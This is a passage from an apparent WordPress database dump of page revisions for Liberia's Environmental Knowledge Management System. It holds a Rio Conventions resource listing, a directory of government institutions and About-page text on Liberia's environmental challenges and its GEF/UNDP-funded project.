sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:46:45','2019-11-12 02:46:45','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1902,1,'2019-11-12 02:48:34','2019-11-12 02:48:34','<h2>Conventions & Protocols</h2>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:48:34','2019-11-12 02:48:34','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1903,1,'2019-11-12 02:49:12','2019-11-12 02:49:12','<h2>Conventions & Protocols</h2>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unfccc/\">UNFCCC</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/unccd/\">UNCCD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n					<a href=\"https://ekmsliberia.info/resource-category/mea/uncbd/\">UNCBD</a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-12 02:49:12','2019-11-12 02:49:12','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(1906,1,'2019-11-12 02:55:30','2019-11-12 02:55:30','<h2>Institutions</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-12 02:55:30','2019-11-12 02:55:30','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(1912,1,'2019-11-12 03:12:29','2019-11-12 03:12:29','','FAQ','','publish','closed','closed','','faq','','','2019-11-25 04:34:11','2019-11-25 04:34:11','',0,'https://ekmsliberia.info/?p=1912',4,'nav_menu_item','',0),(1913,1,'2019-11-12 03:13:33','2019-11-12 03:13:33','','FAQ','','publish','closed','closed','','faq-2','','','2019-11-20 10:42:17','2019-11-20 10:42:17','',0,'https://ekmsliberia.info/?p=1913',2,'nav_menu_item','',0),(1919,1,'2019-11-12 04:20:18','2019-11-12 04:20:18','[posts_table post_type=\"documents_resource\" \ncolumns=\"title,\nsummary,\ntax:document_tag:Document Source,\ntax:document_category,\n\" width=\"auto,300px,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-12 04:20:18','2019-11-12 04:20:18','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(1920,1,'2019-11-12 04:21:33','2019-11-12 04:21:33','[posts_table post_type=\"documents_resource\" \ncolumns=\"title,\nsummary,\ntax:resource_tag:Source/Uploaded By,\ntax:resource_category,\n\" width=\"auto,300px,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-12 04:21:33','2019-11-12 04:21:33','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(1921,1,'2019-11-12 04:23:18','2019-11-12 04:23:18','[posts_table post_type=\"document\" \ncolumns=\"title,\nsummary,\ntax:resource_tag:Source/Uploaded By,\ntax:resource_category,\n\" width=\"auto,300px,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-12 04:23:18','2019-11-12 04:23:18','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(1922,1,'2019-11-12 04:24:35','2019-11-12 04:24:35','[posts_table post_type=\"document\" \ncolumns=\"title,\ndescription,\ntax:resource_tag:Source/Uploaded By,\ntax:resource_category,\n\" width=\"auto,450px,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-12 04:24:35','2019-11-12 04:24:35','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(1923,1,'2019-11-12 04:25:49','2019-11-12 04:25:49','[posts_table post_type=\"document\" \ncolumns=\"title,\ndescription,\ntax:resource_tag:Source/Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,450px,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-12 04:25:49','2019-11-12 04:25:49','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(1924,1,'2019-11-12 04:27:20','2019-11-12 04:27:20','[posts_table post_type=\"document\" \ncolumns=\"title,\nexcerpt,\ntax:resource_tag:Source/Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,450px,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-12 04:27:20','2019-11-12 04:27:20','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(1925,1,'2019-11-12 04:28:24','2019-11-12 04:28:24','[posts_table post_type=\"document\" \ncolumns=\"title,\nexcerpt,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,450px,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-12 04:28:24','2019-11-12 04:28:24','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(1926,1,'2019-11-12 04:28:44','2019-11-12 04:28:44','[posts_table post_type=\"document\" \ncolumns=\"title,\nexcerpt,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"400px,450px,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-12 04:28:44','2019-11-12 04:28:44','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(1931,1,'2019-11-12 04:40:13','2019-11-12 04:40:13','[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"400px,450px,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-12 04:40:13','2019-11-12 04:40:13','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(1937,1,'2019-11-12 04:58:32','2019-11-12 04:58:32','<p style=\"text-align: center;\">The EKMS Will be up soon. Please check back soon!</p>		\n			You are Logged in as Trokon Saykpa (<a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=%2Fwp-admin%2Fadmin-ajax.php&amp;_wpnonce=54d4485753\">Logout</a>)','Under Construction','','publish','closed','closed','','under-construction','','','2019-11-12 05:04:39','2019-11-12 05:04:39','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=1937',0,'elementor_library','',0),(1938,1,'2019-11-12 04:58:32','2019-11-12 04:58:32','','Under Construction','','inherit','closed','closed','','1937-revision-v1','','','2019-11-12 04:58:32','2019-11-12 04:58:32','',1937,'https://ekmsliberia.info/1937-revision-v1/',0,'revision','',0),(1940,1,'2019-11-12 04:59:38','2019-11-12 04:59:38','W','Under Construction','','inherit','closed','closed','','1937-revision-v1','','','2019-11-12 04:59:38','2019-11-12 04:59:38','',1937,'https://ekmsliberia.info/1937-revision-v1/',0,'revision','',0),(1941,1,'2019-11-12 05:00:42','2019-11-12 05:00:42','<p style=\"text-align: center;\">The EKMS Will be up soon. Please check back soon!</p>','Under Construction','','inherit','closed','closed','','1937-revision-v1','','','2019-11-12 05:00:42','2019-11-12 05:00:42','',1937,'https://ekmsliberia.info/1937-revision-v1/',0,'revision','',0),(1942,1,'2019-11-12 05:01:15','2019-11-12 05:01:15','<p style=\"text-align: center;\">The EKMS Will be up soon. Please check back soon!</p>','Under Construction','','inherit','closed','closed','','1937-revision-v1','','','2019-11-12 05:01:15','2019-11-12 05:01:15','',1937,'https://ekmsliberia.info/1937-revision-v1/',0,'revision','',0),(1943,1,'2019-11-12 05:03:26','2019-11-12 05:03:26','<p style=\"text-align: center;\">The EKMS Will be up soon. Please check back soon!</p>		\n			You are Logged in as Trokon Saykpa (<a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=%2Fwp-admin%2Fadmin-ajax.php&amp;_wpnonce=54d4485753\">Logout</a>)','Under Construction','','inherit','closed','closed','','1937-revision-v1','','','2019-11-12 05:03:26','2019-11-12 05:03:26','',1937,'https://ekmsliberia.info/1937-revision-v1/',0,'revision','',0),(1944,1,'2019-11-12 11:16:54','2019-11-12 11:16:54','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p><p><p><p><p><p><p><p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:16:54','2019-11-12 11:16:54','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1945,1,'2019-11-12 11:22:29','2019-11-12 11:22:29','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge<h3><h4>A1. Global Environmental Challenges<h4><p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone.  Liberia is divided into 15 counties, which are subdivided into 90 districts.  Although Liberia is a rather small country, it has significant biodiversity.  There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants.   Some notable species in Liberia include western chimpanzees, forest elephants, and leopards.   Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore.  Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012). \nLiberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution.  The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot.  This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia.  Unfortunately, this remaining forest is at risk serious risk of deforestation.  Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000.  Increases in deforestation and land degradation are largely due to displaced people clearing land.  Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction.  Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).\nClimate change also poses a real threat to Liberia.  Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment).  Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation.  Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).\nAlthough aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns.  Over 60% of Liberians live in poverty.  Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012).  The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources.  Fortunately in January 2016 the outbreak was declared resolved.  Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p> \n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:22:29','2019-11-12 11:22:29','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1946,1,'2019-11-12 11:23:54','2019-11-12 11:23:54','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:23:54','2019-11-12 11:23:54','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1947,1,'2019-11-12 11:27:33','2019-11-12 11:27:33','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, 